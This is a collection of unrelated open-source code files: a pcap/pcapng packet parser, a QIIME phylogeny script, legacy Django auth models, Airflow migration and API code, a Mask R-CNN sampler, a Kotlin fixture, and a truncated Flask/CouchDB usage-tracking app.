if (len(b) - offset) < ipv4size:
continue
ipv4.vsParse(b, offset, fast=True)
# Make b *only* the IP datagram bytes...
b = b[offset:offset+ipv4.totlen]
offset = 0
offset += len(ipv4)
tsize = len(b) - offset
if ipv4.proto == vs_inet.IPPROTO_TCP:
if tsize < 20:
continue
if not reuse:
tcp_hdr = vs_inet.TCP()
tcp_hdr.vsParse(b, offset, fast=True)
offset += len(tcp_hdr)
pdata = b[offset:]
yield pkt,ipv4,tcp_hdr,pdata
elif ipv4.proto == vs_inet.IPPROTO_UDP:
if tsize < 8:
continue
if not reuse:
udp_hdr = vs_inet.UDP()
udp_hdr.vsParse(b, offset, fast=True)
offset += len(udp_hdr)
pdata = b[offset:]
yield pkt,ipv4,udp_hdr,pdata
elif ipv4.proto == vs_inet.IPPROTO_ICMP:
if tsize < 4:
continue
if not reuse:
icmp_hdr = vs_inet.ICMP()
icmp_hdr.vsParse(b, offset, fast=True)
offset += len(icmp_hdr)
pdata = b[offset:]
yield pkt,ipv4,icmp_hdr,pdata
else:
pass
#print 'UNHANDLED IP PROTOCOL: %d' % ipv4.proto
def _iterPcapNgFile(fd, reuse=False):
header = PCAPNG_GENERIC_BLOCK_HEADER()
ifaceidx = 0
ifacedict = {}
roff = 0
bigend = False
curroff = fd.tell()
b0 = fd.read(len(header))
fd.seek(curroff)
while len(b0) == len(header):
header.vsParse(b0, fast=True)
body = fd.read(header.blocksize)
if header.blocktype == PCAPNG_BLOCKTYPE_SECTION_HEADER:
shb = PCAPNG_SECTION_HEADER_BLOCK()
roff = shb.vsParse(body)
bigend = shb.bigend
#reset interface stuff since we're in a new section
ifaceidx = 0
ifacedict = {}
elif header.blocktype == PCAPNG_BLOCKTYPE_INTERFACE_DESCRIPTION:
idb = PCAPNG_INTERFACE_DESCRIPTION_BLOCK(bigend)
roff = idb.vsParse(body)
#save off the interface for later reference
ifacedict[ifaceidx] = idb
ifaceidx += 1
elif header.blocktype == PCAPNG_BLOCKTYPE_SIMPLE_PACKET:
spb = PCAPNG_SIMPLE_PACKET_BLOCK(bigend)
roff = spb.vsParse(body)
tup = _parsePcapngPacketBytes(iface.linktype, spb)
if tup is not None:
#if it is None, just fall through & read next block
yield tup
elif header.blocktype == PCAPNG_BLOCKTYPE_ENHANCED_PACKET:
epb = PCAPNG_ENHANCED_PACKET_BLOCK(bigend)
roff = epb.vsParse(body)
iface = ifacedict.get(epb.interfaceid)
epb.setPcapTimestamp(iface)
tup = _parsePcapngPacketBytes(iface.linktype, epb)
if tup is not None:
#if tup is None, just fall through & read next block
yield tup
#TODO: other blocks needed?
#PCAPNG_BLOCKTYPE_PACKET (obsolete)
#PCAPNG_BLOCKTYPE_NAME_RESOLUTION:
#PCAPNG_BLOCKTYPE_INTERFACE_STATS:
else:
#print 'Unknown block type: 0x%08x: 0x%08x 0x%08x bytes' % (roff, header.blocktype, header.blocksize)
pass
curroff = fd.tell()
b0 = fd.read(len(header))
fd.seek(curroff)
def _parsePcapngPacketBytes(linktype, pkt):
'''
pkt is either a parsed PCAPNG_SIMPLE_PACKET_BLOCK or PCAPNG_ENHANCED_PACKET_BLOCK
On success Returns tuple (pcapng_pkt, ipv4_vstruct, transport_vstruc, pdata)
Returns None if the packet can't be parsed
'''
if linktype not in (PCAP_LINKTYPE_ETHER, PCAP_LINKTYPE_RAW):
raise Exception('PCAP Link Type %d Not Supported Yet!' % linktype)
#pkt = PCAP_PACKET_HEADER()
eII = vs_inet.ETHERII()
eIIsize = len(eII)
offset = 0
if linktype == PCAP_LINKTYPE_ETHER:
if len(pkt.data) < eIIsize:
return None
eII.vsParse(pkt.data, 0, fast=True)
# No support for non-ip protocol yet...
if eII.etype not in (vs_inet.ETH_P_IP,vs_inet.ETH_P_VLAN):
return None
offset += eIIsize
if eII.etype == vs_inet.ETH_P_VLAN:
offset += 4
elif linktype == PCAP_LINKTYPE_RAW:
pass
ipv4 = vs_inet.IPv4()
if (len(pkt.data) - offset) < len(ipv4):
return None
ipv4.vsParse(pkt.data, offset, fast=True)
# Make b *only* the IP datagram bytes...
b = pkt.data[offset:offset+ipv4.totlen]
offset = 0
offset += len(ipv4)
tsize = len(b) - offset
if ipv4.proto == vs_inet.IPPROTO_TCP:
if tsize < 20:
return None
tcp_hdr = vs_inet.TCP()
tcp_hdr.vsParse(b, offset, fast=True)
offset += len(tcp_hdr)
pdata = b[offset:]
return pkt,ipv4,tcp_hdr,pdata
elif ipv4.proto == vs_inet.IPPROTO_UDP:
if tsize < 8:
return None
udp_hdr = vs_inet.UDP()
udp_hdr.vsParse(b, offset, fast=True)
offset += len(udp_hdr)
pdata = b[offset:]
return pkt,ipv4,udp_hdr,pdata
elif ipv4.proto == vs_inet.IPPROTO_ICMP:
if tsize < 4:
return None
icmp_hdr = vs_inet.ICMP()
icmp_hdr.vsParse(b, offset, fast=True)
offset += len(icmp_hdr)
pdata = b[offset:]
return pkt,ipv4,icmp_hdr,pdata
else:
pass
#print 'UNHANDLED IP PROTOCOL: %d' % ipv4.proto
return None | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
# File created on 09 Feb 2010
from __future__ import division
__author__ = "Justin Kuczynski, Jens Reeder"
__copyright__ = "Copyright 2011, The QIIME Project"
__credits__ = ["Justin Kuczynski"]
__license__ = "GPL"
__version__ = "1.9.1-dev"
__maintainer__ = "Justin Kuczynski"
__email__ = "justinak@gmail.com"
from os.path import splitext
from qiime.util import make_option
from qiime.util import parse_command_line_parameters
from qiime.make_phylogeny import tree_module_names, tree_method_constructors,\
CogentTreeBuilder
import warnings
script_info = {}
script_info['brief_description'] = """Make Phylogeny"""
script_info[
'script_description'] = """Many downstream analyses require that the phylogenetic tree relating the OTUs in a study be present. The script make_phylogeny.py produces this tree from a multiple sequence alignment. Trees are constructed with a set of sequences representative of the OTUs, by default using FastTree (Price, Dehal, & Arkin, 2009)."""
script_info['script_usage'] = []
script_info['script_usage'].append(
("""Examples:""",
"""A simple example of make_phylogeny.py is shown by the following command, where we use the default tree building method (fasttree) and write the file to the current working directory without a log file:""",
"""%prog -i $PWD/aligned.fasta -o $PWD/rep_phylo.tre"""))
script_info['script_usage'].append(
("""""",
"""Alternatively, if the user would prefer using another tree building method (i.e. clearcut (Sheneman, Evans, & Foster, 2006)), then they could use the following command:""",
"""%prog -i $PWD/aligned.fasta -t clearcut"""))
script_info['output_description'] = """The result of make_phylogeny.py consists of a newick formatted tree file (.tre) and optionally a log file. The tree file is formatted using the Newick format and this file can be viewed using most tree visualization tools, such as TopiaryTool, FigTree, etc.
The tips of the tree are the first word from the input sequences from the fasta file, e.g.: '>101 PC.481_71 RC:1..220' is represented in the tree as '101'."""
script_info['required_options'] = [
make_option('-i', '--input_fp', action='store',
type='existing_filepath', dest='input_fp', help='Path to read ' +
'input fasta alignment, only first word in defline will be considered')
]
valid_root_methods = ['midpoint', 'tree_method_default']
script_info['optional_options'] = [
make_option(
'-t', '--tree_method', action='store', type='choice', choices=list(tree_module_names.keys()),
help='Method for tree building. Valid choices are: ' +
', '.join(tree_module_names.keys()) +
' [default: %default]', default='fasttree'),
make_option('-o', '--result_fp', action='store', type='new_filepath',
help='Path to store ' +
'result file [default: <input_sequences_filename>.tre]'),
make_option('-l', '--log_fp', action='store', type='new_filepath',
help='Path to store ' +
'log file [default: No log file created.]'),
make_option(
'-r', '--root_method', action='store', type='choice', choices=list(valid_root_methods),
help='method for choosing root of phylo tree' +
' Valid choices are: ' + ', '.join(valid_root_methods) +
' [default: tree_method_default]',
default='tree_method_default'),
]
script_info['version'] = __version__
def main():
option_parser, opts, args = parse_command_line_parameters(**script_info)
if not (opts.tree_method in tree_method_constructors or
opts.tree_method in tree_module_names):
option_parser.error(
'Invalid alignment method: %s.\nValid choices are: %s'
% (opts.tree_method,
' '.join(tree_method_constructors.keys() +
tree_module_names.keys())))
try:
tree_builder_constructor =\
tree_method_constructors[opts.tree_method]
tree_builder_type = 'Constructor'
params = {}
tree_builder = tree_builder_constructor(params)
except KeyError:
tree_builder = CogentTreeBuilder({
'Module': tree_module_names[opts.tree_method],
'Method': opts.tree_method
})
tree_builder_type = 'Cogent'
input_seqs_filepath = opts.input_fp
result_path = opts.result_fp
if not result_path: # empty or None
fpath, ext = splitext(input_seqs_filepath) # fpath omits extension
result_path = fpath + ".tre"
open(result_path, 'w').close() # touch
log_path = opts.log_fp
if log_path is not None:
open(log_path, 'w').close()
if tree_builder_type == 'Constructor':
tree_builder(input_seqs_filepath,
result_path=result_path, log_path=log_path, failure_path=failure_path)
elif tree_builder_type == 'Cogent':
tree_builder(result_path, aln_path=input_seqs_filepath,
log_path=log_path, root_method=opts.root_method)
if __name__ == "__main__":
main() | unknown | codeparrot/codeparrot-clean | ||
import datetime
import urllib
from django.contrib import auth
from django.contrib.auth.signals import user_logged_in
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.db.models.manager import EmptyManager
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import smart_str
from django.utils.hashcompat import md5_constructor, sha_constructor
from django.utils.translation import ugettext_lazy as _
from django.utils.crypto import constant_time_compare
UNUSABLE_PASSWORD = '!' # This will never be a valid hash
def get_hexdigest(algorithm, salt, raw_password):
"""
Returns a string of the hexdigest of the given plaintext password and salt
using the given algorithm ('md5', 'sha1' or 'crypt').
"""
raw_password, salt = smart_str(raw_password), smart_str(salt)
if algorithm == 'crypt':
try:
import crypt
except ImportError:
raise ValueError('"crypt" password algorithm not supported in this environment')
return crypt.crypt(raw_password, salt)
if algorithm == 'md5':
return md5_constructor(salt + raw_password).hexdigest()
elif algorithm == 'sha1':
return sha_constructor(salt + raw_password).hexdigest()
raise ValueError("Got unknown password algorithm type in password.")
def check_password(raw_password, enc_password):
"""
Returns a boolean of whether the raw_password was correct. Handles
encryption formats behind the scenes.
"""
algo, salt, hsh = enc_password.split('$')
return constant_time_compare(hsh, get_hexdigest(algo, salt, raw_password))
def update_last_login(sender, user, **kwargs):
"""
A signal receiver which updates the last_login date for
the user logging in.
"""
user.last_login = datetime.datetime.now()
user.save()
user_logged_in.connect(update_last_login)
class SiteProfileNotAvailable(Exception):
pass
class PermissionManager(models.Manager):
def get_by_natural_key(self, codename, app_label, model):
return self.get(
codename=codename,
content_type=ContentType.objects.get_by_natural_key(app_label, model)
)
class Permission(models.Model):
"""The permissions system provides a way to assign permissions to specific users and groups of users.
The permission system is used by the Django admin site, but may also be useful in your own code. The Django admin site uses permissions as follows:
- The "add" permission limits the user's ability to view the "add" form and add an object.
- The "change" permission limits a user's ability to view the change list, view the "change" form and change an object.
- The "delete" permission limits the ability to delete an object.
Permissions are set globally per type of object, not per specific object instance. It is possible to say "Mary may change news stories," but it's not currently possible to say "Mary may change news stories, but only the ones she created herself" or "Mary may only change news stories that have a certain status or publication date."
Three basic permissions -- add, change and delete -- are automatically created for each Django model.
"""
name = models.CharField(_('name'), max_length=50)
content_type = models.ForeignKey(ContentType)
codename = models.CharField(_('codename'), max_length=100)
objects = PermissionManager()
class Meta:
verbose_name = _('permission')
verbose_name_plural = _('permissions')
unique_together = (('content_type', 'codename'),)
ordering = ('codename',)
def __unicode__(self):
return u"%s | %s | %s" % (
unicode(self.content_type.app_label),
unicode(self.content_type),
unicode(self.name))
def natural_key(self):
return (self.codename,) + self.content_type.natural_key()
natural_key.dependencies = ['contenttypes.contenttype']
class Group(models.Model):
"""Groups are a generic way of categorizing users to apply permissions, or some other label, to those users. A user can belong to any number of groups.
A user in a group automatically has all the permissions granted to that group. For example, if the group Site editors has the permission can_edit_home_page, any user in that group will have that permission.
Beyond permissions, groups are a convenient way to categorize users to apply some label, or extended functionality, to them. For example, you could create a group 'Special users', and you could write code that would do special things to those users -- such as giving them access to a members-only portion of your site, or sending them members-only e-mail messages.
"""
name = models.CharField(_('name'), max_length=80, unique=True)
permissions = models.ManyToManyField(Permission, verbose_name=_('permissions'), blank=True)
class Meta:
verbose_name = _('group')
verbose_name_plural = _('groups')
def __unicode__(self):
return self.name
class UserManager(models.Manager):
def create_user(self, username, email, password=None):
"""
Creates and saves a User with the given username, e-mail and password.
"""
now = datetime.datetime.now()
# Normalize the address by lowercasing the domain part of the email
# address.
try:
email_name, domain_part = email.strip().split('@', 1)
except ValueError:
pass
else:
email = '@'.join([email_name, domain_part.lower()])
user = self.model(username=username, email=email, is_staff=False,
is_active=True, is_superuser=False, last_login=now,
date_joined=now)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, username, email, password):
u = self.create_user(username, email, password)
u.is_staff = True
u.is_active = True
u.is_superuser = True
u.save(using=self._db)
return u
def make_random_password(self, length=10, allowed_chars='abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ23456789'):
"Generates a random password with the given length and given allowed_chars"
# Note that default value of allowed_chars does not have "I" or letters
# that look like it -- just to avoid confusion.
from random import choice
return ''.join([choice(allowed_chars) for i in range(length)])
# A few helper functions for common logic between User and AnonymousUser.
def _user_get_all_permissions(user, obj):
permissions = set()
anon = user.is_anonymous()
for backend in auth.get_backends():
if not anon or backend.supports_anonymous_user:
if hasattr(backend, "get_all_permissions"):
if obj is not None:
if backend.supports_object_permissions:
permissions.update(
backend.get_all_permissions(user, obj)
)
else:
permissions.update(backend.get_all_permissions(user))
return permissions
def _user_has_perm(user, perm, obj):
anon = user.is_anonymous()
active = user.is_active
for backend in auth.get_backends():
if (not active and not anon and backend.supports_inactive_user) or \
(not anon or backend.supports_anonymous_user):
if hasattr(backend, "has_perm"):
if obj is not None:
if (backend.supports_object_permissions and
backend.has_perm(user, perm, obj)):
return True
else:
if backend.has_perm(user, perm):
return True
return False
def _user_has_module_perms(user, app_label):
anon = user.is_anonymous()
active = user.is_active
for backend in auth.get_backends():
if (not active and not anon and backend.supports_inactive_user) or \
(not anon or backend.supports_anonymous_user):
if hasattr(backend, "has_module_perms"):
if backend.has_module_perms(user, app_label):
return True
return False
class User(models.Model):
"""
Users within the Django authentication system are represented by this model.
Username and password are required. Other fields are optional.
"""
username = models.CharField(_('username'), max_length=30, unique=True, help_text=_("Required. 30 characters or fewer. Letters, numbers and @/./+/-/_ characters"))
first_name = models.CharField(_('first name'), max_length=30, blank=True)
last_name = models.CharField(_('last name'), max_length=30, blank=True)
email = models.EmailField(_('e-mail address'), blank=True)
password = models.CharField(_('password'), max_length=128, help_text=_("Use '[algo]$[salt]$[hexdigest]' or use the <a href=\"password/\">change password form</a>."))
is_staff = models.BooleanField(_('staff status'), default=False, help_text=_("Designates whether the user can log into this admin site."))
is_active = models.BooleanField(_('active'), default=True, help_text=_("Designates whether this user should be treated as active. Unselect this instead of deleting accounts."))
is_superuser = models.BooleanField(_('superuser status'), default=False, help_text=_("Designates that this user has all permissions without explicitly assigning them."))
last_login = models.DateTimeField(_('last login'), default=datetime.datetime.now)
date_joined = models.DateTimeField(_('date joined'), default=datetime.datetime.now)
groups = models.ManyToManyField(Group, verbose_name=_('groups'), blank=True,
help_text=_("In addition to the permissions manually assigned, this user will also get all permissions granted to each group he/she is in."))
user_permissions = models.ManyToManyField(Permission, verbose_name=_('user permissions'), blank=True)
objects = UserManager()
class Meta:
verbose_name = _('user')
verbose_name_plural = _('users')
def __unicode__(self):
return self.username
def get_absolute_url(self):
return "/users/%s/" % urllib.quote(smart_str(self.username))
def is_anonymous(self):
"""
Always returns False. This is a way of comparing User objects to
anonymous users.
"""
return False
def is_authenticated(self):
"""
Always return True. This is a way to tell if the user has been
authenticated in templates.
"""
return True
def get_full_name(self):
"Returns the first_name plus the last_name, with a space in between."
full_name = u'%s %s' % (self.first_name, self.last_name)
return full_name.strip()
def set_password(self, raw_password):
if raw_password is None:
self.set_unusable_password()
else:
import random
algo = 'sha1'
salt = get_hexdigest(algo, str(random.random()), str(random.random()))[:5]
hsh = get_hexdigest(algo, salt, raw_password)
self.password = '%s$%s$%s' % (algo, salt, hsh)
def check_password(self, raw_password):
"""
Returns a boolean of whether the raw_password was correct. Handles
encryption formats behind the scenes.
"""
# Backwards-compatibility check. Older passwords won't include the
# algorithm or salt.
if '$' not in self.password:
is_correct = (self.password == get_hexdigest('md5', '', raw_password))
if is_correct:
# Convert the password to the new, more secure format.
self.set_password(raw_password)
self.save()
return is_correct
return check_password(raw_password, self.password)
def set_unusable_password(self):
# Sets a value that will never be a valid hash
self.password = UNUSABLE_PASSWORD
def has_usable_password(self):
if self.password is None \
or self.password == UNUSABLE_PASSWORD:
return False
else:
return True
def get_group_permissions(self, obj=None):
"""
Returns a list of permission strings that this user has through
his/her groups. This method queries all available auth backends.
If an object is passed in, only permissions matching this object
are returned.
"""
permissions = set()
for backend in auth.get_backends():
if hasattr(backend, "get_group_permissions"):
if obj is not None:
if backend.supports_object_permissions:
permissions.update(
backend.get_group_permissions(self, obj)
)
else:
permissions.update(backend.get_group_permissions(self))
return permissions
def get_all_permissions(self, obj=None):
return _user_get_all_permissions(self, obj)
def has_perm(self, perm, obj=None):
"""
Returns True if the user has the specified permission. This method
queries all available auth backends, but returns immediately if any
backend returns True. Thus, a user who has permission from a single
auth backend is assumed to have permission in general. If an object
is provided, permissions for this specific object are checked.
"""
# Active superusers have all permissions.
if self.is_active and self.is_superuser:
return True
# Otherwise we need to check the backends.
return _user_has_perm(self, perm, obj)
def has_perms(self, perm_list, obj=None):
"""
Returns True if the user has each of the specified permissions.
If object is passed, it checks if the user has all required perms
for this object.
"""
for perm in perm_list:
if not self.has_perm(perm, obj):
return False
return True
def has_module_perms(self, app_label):
"""
Returns True if the user has any permissions in the given app
label. Uses pretty much the same logic as has_perm, above.
"""
# Active superusers have all permissions.
if self.is_active and self.is_superuser:
return True
return _user_has_module_perms(self, app_label)
def get_and_delete_messages(self):
messages = []
for m in self.message_set.all():
messages.append(m.message)
m.delete()
return messages
def email_user(self, subject, message, from_email=None):
"Sends an e-mail to this User."
from django.core.mail import send_mail
send_mail(subject, message, from_email, [self.email])
def get_profile(self):
"""
Returns site-specific profile for this user. Raises
SiteProfileNotAvailable if this site does not allow profiles.
"""
if not hasattr(self, '_profile_cache'):
from django.conf import settings
if not getattr(settings, 'AUTH_PROFILE_MODULE', False):
raise SiteProfileNotAvailable('You need to set AUTH_PROFILE_MO'
'DULE in your project settings')
try:
app_label, model_name = settings.AUTH_PROFILE_MODULE.split('.')
except ValueError:
raise SiteProfileNotAvailable('app_label and model_name should'
' be separated by a dot in the AUTH_PROFILE_MODULE set'
'ting')
try:
model = models.get_model(app_label, model_name)
if model is None:
raise SiteProfileNotAvailable('Unable to load the profile '
'model, check AUTH_PROFILE_MODULE in your project sett'
'ings')
self._profile_cache = model._default_manager.using(self._state.db).get(user__id__exact=self.id)
self._profile_cache.user = self
except (ImportError, ImproperlyConfigured):
raise SiteProfileNotAvailable
return self._profile_cache
def _get_message_set(self):
import warnings
warnings.warn('The user messaging API is deprecated. Please update'
' your code to use the new messages framework.',
category=DeprecationWarning)
return self._message_set
message_set = property(_get_message_set)
class Message(models.Model):
"""
The message system is a lightweight way to queue messages for given
users. A message is associated with a User instance (so it is only
applicable for registered users). There's no concept of expiration or
timestamps. Messages are created by the Django admin after successful
actions. For example, "The poll Foo was created successfully." is a
message.
"""
user = models.ForeignKey(User, related_name='_message_set')
message = models.TextField(_('message'))
def __unicode__(self):
return self.message
class AnonymousUser(object):
id = None
username = ''
is_staff = False
is_active = False
is_superuser = False
_groups = EmptyManager()
_user_permissions = EmptyManager()
def __init__(self):
pass
def __unicode__(self):
return 'AnonymousUser'
def __str__(self):
return unicode(self).encode('utf-8')
def __eq__(self, other):
return isinstance(other, self.__class__)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return 1 # instances always return the same hash value
def save(self):
raise NotImplementedError
def delete(self):
raise NotImplementedError
def set_password(self, raw_password):
raise NotImplementedError
def check_password(self, raw_password):
raise NotImplementedError
def _get_groups(self):
return self._groups
groups = property(_get_groups)
def _get_user_permissions(self):
return self._user_permissions
user_permissions = property(_get_user_permissions)
def get_group_permissions(self, obj=None):
return set()
def get_all_permissions(self, obj=None):
return _user_get_all_permissions(self, obj=obj)
def has_perm(self, perm, obj=None):
return _user_has_perm(self, perm, obj=obj)
def has_perms(self, perm_list, obj=None):
for perm in perm_list:
if not self.has_perm(perm, obj):
return False
return True
def has_module_perms(self, module):
return _user_has_module_perms(self, module)
def get_and_delete_messages(self):
return []
def is_anonymous(self):
return True
def is_authenticated(self):
return False | unknown | codeparrot/codeparrot-clean | ||
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
add dataset_expression in DagModel.
Revision ID: ab34f260b71c
Revises: d75389605139
Create Date: 2024-03-07 19:54:38.316059
"""
from __future__ import annotations
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "ab34f260b71c"
down_revision = "d75389605139"
branch_labels = None
depends_on = None
airflow_version = "2.9.0"
def upgrade():
"""Apply Add dataset_expression to DagModel."""
with op.batch_alter_table("dag") as batch_op:
batch_op.add_column(sa.Column("dataset_expression", sa.JSON(), nullable=True))
def downgrade():
"""Unapply Add dataset_expression to DagModel."""
with op.batch_alter_table("dag") as batch_op:
batch_op.drop_column("dataset_expression") | python | github | https://github.com/apache/airflow | airflow-core/src/airflow/migrations/versions/0011_2_9_0_add_dataset_expression_in_dagmodel.py |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
import torch
from ..utils import nonzero
class BalancedPositiveNegativeSampler(object):
"""
This class samples batches, ensuring that they contain a fixed proportion of positives
"""
def __init__(self, batch_size_per_image, positive_fraction):
"""
Arguments:
batch_size_per_image (int): number of elements to be selected per image
positive_fraction (float): percentace of positive elements per batch
"""
self.batch_size_per_image = batch_size_per_image
self.positive_fraction = positive_fraction
def __call__(self, matched_idxs):
"""
Arguments:
matched idxs: list of tensors containing -1, 0 or positive values.
Each tensor corresponds to a specific image.
-1 values are ignored, 0 are considered as negatives and > 0 as
positives.
Returns:
pos_idx (list[tensor])
neg_idx (list[tensor])
Returns two lists of binary masks for each image.
The first list contains the positive elements that were selected,
and the second list the negative example.
"""
pos_idx = []
neg_idx = []
#if list not empty
if matched_idxs:
device=matched_idxs[0].device
for matched_idxs_per_image in matched_idxs:
positive = nonzero(matched_idxs_per_image >= 1)[0]
negative = nonzero(matched_idxs_per_image == 0)[0]
num_pos = int(self.batch_size_per_image * self.positive_fraction)
# protect against not enough positive examples
num_pos = min(positive.numel(), num_pos)
num_neg = self.batch_size_per_image - num_pos
# protect against not enough negative examples
num_neg = min(negative.numel(), num_neg)
# randomly select positive and negative examples
perm1 = torch.randperm(positive.numel(),device=device)[:num_pos]
perm2 = torch.randperm(negative.numel(),device=device)[:num_neg]
pos_idx_per_image = positive[perm1]
neg_idx_per_image = negative[perm2]
# create binary mask from indices
pos_idx_per_image_mask = torch.zeros_like(
matched_idxs_per_image, dtype=torch.uint8
)
neg_idx_per_image_mask = torch.zeros_like(
matched_idxs_per_image, dtype=torch.uint8
)
pos_idx_per_image_mask[pos_idx_per_image] = 1
neg_idx_per_image_mask[neg_idx_per_image] = 1
pos_idx.append(pos_idx_per_image_mask)
neg_idx.append(neg_idx_per_image_mask)
return pos_idx, neg_idx | unknown | codeparrot/codeparrot-clean | ||
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
from fastapi import Depends, HTTPException, status
from sqlalchemy import or_, select, union_all
from airflow.api_fastapi.auth.managers.models.resource_details import DagAccessEntity
from airflow.api_fastapi.common.db.common import SessionDep
from airflow.api_fastapi.common.router import AirflowRouter
from airflow.api_fastapi.core_api.datamodels.ui.gantt import GanttResponse, GanttTaskInstance
from airflow.api_fastapi.core_api.openapi.exceptions import create_openapi_http_exception_doc
from airflow.api_fastapi.core_api.security import requires_access_dag
from airflow.models.taskinstance import TaskInstance
from airflow.models.taskinstancehistory import TaskInstanceHistory
from airflow.utils.state import TaskInstanceState
gantt_router = AirflowRouter(prefix="/gantt", tags=["Gantt"])
@gantt_router.get(
"/{dag_id}/{run_id}",
responses=create_openapi_http_exception_doc(
[
status.HTTP_404_NOT_FOUND,
]
),
dependencies=[
Depends(
requires_access_dag(
method="GET",
access_entity=DagAccessEntity.TASK_INSTANCE,
)
),
Depends(
requires_access_dag(
method="GET",
access_entity=DagAccessEntity.RUN,
)
),
],
)
def get_gantt_data(
dag_id: str,
run_id: str,
session: SessionDep,
) -> GanttResponse:
"""Get all task instance tries for Gantt chart."""
# Exclude mapped tasks (use grid summaries) and UP_FOR_RETRY (already in history)
current_tis = select(
TaskInstance.task_id.label("task_id"),
TaskInstance.task_display_name.label("task_display_name"), # type: ignore[attr-defined]
TaskInstance.try_number.label("try_number"),
TaskInstance.state.label("state"),
TaskInstance.start_date.label("start_date"),
TaskInstance.end_date.label("end_date"),
).where(
TaskInstance.dag_id == dag_id,
TaskInstance.run_id == run_id,
TaskInstance.map_index == -1,
or_(TaskInstance.state != TaskInstanceState.UP_FOR_RETRY, TaskInstance.state.is_(None)),
)
history_tis = select(
TaskInstanceHistory.task_id.label("task_id"),
TaskInstanceHistory.task_display_name.label("task_display_name"),
TaskInstanceHistory.try_number.label("try_number"),
TaskInstanceHistory.state.label("state"),
TaskInstanceHistory.start_date.label("start_date"),
TaskInstanceHistory.end_date.label("end_date"),
).where(
TaskInstanceHistory.dag_id == dag_id,
TaskInstanceHistory.run_id == run_id,
TaskInstanceHistory.map_index == -1,
)
combined = union_all(current_tis, history_tis).subquery()
query = select(combined).order_by(combined.c.task_id, combined.c.try_number)
results = session.execute(query).fetchall()
if not results:
raise HTTPException(
status.HTTP_404_NOT_FOUND,
f"No task instances for dag_id={dag_id} run_id={run_id}",
)
task_instances = [
GanttTaskInstance(
task_id=row.task_id,
task_display_name=row.task_display_name,
try_number=row.try_number,
state=row.state,
start_date=row.start_date,
end_date=row.end_date,
)
for row in results
]
return GanttResponse(dag_id=dag_id, run_id=run_id, task_instances=task_instances) | python | github | https://github.com/apache/airflow | airflow-core/src/airflow/api_fastapi/core_api/routes/ui/gantt.py |
fun foo() {}
fun test() {
fo<caret>o()
} | kotlin | github | https://github.com/JetBrains/kotlin | analysis/analysis-api/testData/danglingFileReferenceResolve/functionSameFile.kt |
#!/usr/bin/env python
from flask import Flask, request
import couchdb, json, datetime
app = Flask(__name__)
''' *** List of accessible api urls ***
***NOTE: until Akash finishes user authentication/security, <string:id> will be the name of the user
1. '/' is a get request that tests accessibility to the flask server
2. '/view/' is a get request that returns all the documents (with _id = 'id') in the database
3. '/get/<string:userid>/' is a get request that returns all of the information in the database corresponding to a specific userid user including goals, _id, _rev, etc.
4. '/getapps/<string:userid>/' is a get request that returns only the application data dictionary
5. '/newuser/<string:userid>/' is a put request that creates a new user
6. '/app/<string:userid>/<string:app>' is open to both PUT and DELETE requests
a. the PUT request places that app in the database if not already present, otherwise does nothing to prevent overriding data that may exist
b. the DELETE request removes the app from the database if present
7. '/getgoal/<string:userid>/' is a get request that retrieves the Daily and Weekly Goals from the server
8. '/newgoal/<string:userid>/<int:daily>/<int:weekly>/' is a put requests that can be used to set new goals
9. '/usage/<string:userid>/' is a put request that takes in json usage data and if that app does not yet exist, creates it in the database, and then updates the current day to reflect the json usage data sent by the put request
Database Structure - refer to indents as higherarchy
** Inside each document is a dictionary of dictionaries. **
Couchdb Server
-> database userid
-> user titled documents within database
-> _id
-> _rev
-> Appdata
-> Total
-> S : value
-> M : value
-> T : value
-> W : value
-> R : value
-> F : value
-> Tot : value
-> Repeat for each app
-> Goals
-> Daily : value
-> Weekly : value
'''
server = couchdb.Server()
db = server['test']
headers = {'Content-Type': 'application/json'}
Weekly = {'S': 0, 'M': 0, 'T': 0, 'W': 0, 'R': 0, 'F': 0, 'Sa': 0, 'Tot': 0}
#Weekly Time holders for each app
Goals = {'Daily': 24, 'Weekly': 150}
#make goals unreachable so notifications have to be set first
def dayToIndex(day):
switcher = {
'Mon': 'M',
'Tue': 'T',
'Wed': 'W',
'Thu': 'R',
'Fri': 'F',
'Sat': 'Sa',
'Sun': 'S'
}
return switcher.get(day, "nothing")
def appTotal(Appdata):
for app, data in Appdata.items():
if app != 'Total':
total = 0
for day, hours in data.items():
if day != 'Tot': #updates the total usage in each respective App dictionary
total += hours
data['Tot'] = total #updates total for that app
weekly = 0
for day in Weekly:
if day != 'Tot':
today = 0
for app, data in Appdata.items():
if day != 'Tot':
today += data[day]
Appdata['Total'][day] = today #updates total for the day
weekly += today
Appdata['Total']['Tot'] = weekly #updates weekly total
return Appdata
@app.route('/')
def welcome():
return "Welcome to Focus" + "\n"
@app.route('/view/', methods = ['GET'])
#curl -X GET http://localhost:5000/view/
def getDocs():
return json.dumps(db.get('_all_docs')) + "\n"
@app.route('/get/<string:userid>/', methods = ['GET'])
#curl -X GET http://localhost:5000/get/<userid>/
def getName(userid):
